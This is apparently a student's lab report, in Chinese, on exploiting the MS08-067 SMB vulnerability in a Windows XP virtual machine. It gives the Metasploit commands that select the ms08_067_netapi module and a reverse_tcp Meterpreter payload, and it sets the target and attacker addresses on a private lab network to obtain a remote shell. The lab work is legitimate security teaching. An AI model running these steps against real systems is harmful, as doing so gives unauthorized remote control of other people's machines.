20169202 2016-2017-2《Windows攻击》

Windows攻击

实验要求:使用Metaspoit攻击MS08-067,提交正确得到远程Shell的截图,加上自己的学号水印
(1):MS08-067远程溢出漏洞描述

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。

(2) :攻击机和靶机

攻击机:kali Linux
IP:192.168.232.130

靶机:Windows xp
IP:192.168.232.140

(3):攻击过程

  • kali开启metasploit,msfconsole

  • 使用MS08_067漏洞
    use windows/smb/ms08_067_netapi
    set PAYLOAD windows/meterpreter/reverse_tcp
    show options

  • 设置远程地址,正向连接,显示MS08_067的攻击漏洞
    set RHOST 192.168.232.140
    set LHOST 192.168.232.130
    show targets

  • 选择攻击方式,如“set TARGET 0使用exploit攻击,成功返回shell。

参考资料

MS08-067漏洞重现
ms08-067漏洞 远程溢出入侵测试

原文地址:https://www.cnblogs.com/zhaohui801/p/6899528.html